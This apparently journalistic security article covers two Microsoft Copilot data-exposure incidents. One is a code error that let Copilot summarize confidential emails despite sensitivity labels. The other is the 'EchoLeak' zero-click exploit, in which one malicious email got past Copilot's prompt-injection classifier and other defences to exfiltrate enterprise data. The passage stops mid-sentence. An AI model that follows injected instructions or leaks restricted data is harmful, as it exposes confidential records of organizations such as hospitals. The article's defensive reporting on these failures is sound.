Microsoft Copilot Bypasses Sensitivity Labels Twice in Eight Months, Exposing Confidential Data and Highlighting AI Trust Boundary Failures
Microsoft's Copilot has twice ignored sensitivity labels and data loss prevention (DLP) policies within an eight-month period, leading to the unauthorized processing of confidential information. In January, Copilot summarized confidential emails for four weeks despite explicit restrictions, with the U.K.'s National Health Service among affected organizations. This incident, tracked by Microsoft as CW1226324, follows a more severe vulnerability in June 2025 (CVE-2025-32711, dubbed "EchoLeak"). This critical zero-click exploit allowed a malicious email to bypass multiple Copilot security features and silently exfiltrate enterprise data, earning a CVSS score of 9.3. Both incidents, stemming from different root causes (a code error and a sophisticated exploit), resulted in Copilot accessing restricted data without detection by traditional security tools like EDR and WAF, which are architecturally blind to AI trust boundary violations within LLM retrieval pipelines.
For four weeks starting January 21, Microsoft's Copilot read and summarized confidential emails despite every sensitivity label and DLP policy telling it not to. The enforcement points broke inside Microsoft’s own pipeline, and no security tool in the stack flagged it. Among the affected organizations was the U.K.'s National Health Service, which logged it as INC46740412 — a signal of how far the failure reached into regulated healthcare environments. Microsoft tracked it as CW1226324. The advisory, first reported by BleepingComputer on February 18, marks the second time in eight months that Copilot’s retrieval pipeline violated its own trust boundary — a failure in which an AI system accesses or transmits data it was explicitly restricted from touching. The first was worse.
In June 2025, Microsoft patched CVE-2025-32711, a critical zero-click vulnerability that Aim Security researchers dubbed “EchoLeak.” One malicious email bypassed Copilot’s prompt injection classifier, its link redaction, its Content-Security-Policy, and its reference mentions to silently exfiltrate enterprise data. No clicks and no user action were required. Microsoft assigned it a CVSS score of 9.3.
Two different root causes; one blind spot: A code error and a sophisticated exploit chain produced an identical outcome. Copilot processed data it was explicitly restricted from touching, and the security stack saw nothing.
Why EDR and WAF continue to be architecturally blind to this: Endpoint detection and response (EDR) monitors file and process behavior. Web application firewalls (WAFs) inspect HTTP payloads. Neither has a detection category for “your AI assistant just violated its own trust boundary.” That gap exists because LLM retrieval pipelines sit behind an enforcement layer that traditional security tools were never designed to observe.
Copilot ingested a labeled email it was told to skip, and the entire action happened inside Microsoft's infrastructure. Between the retrieval inde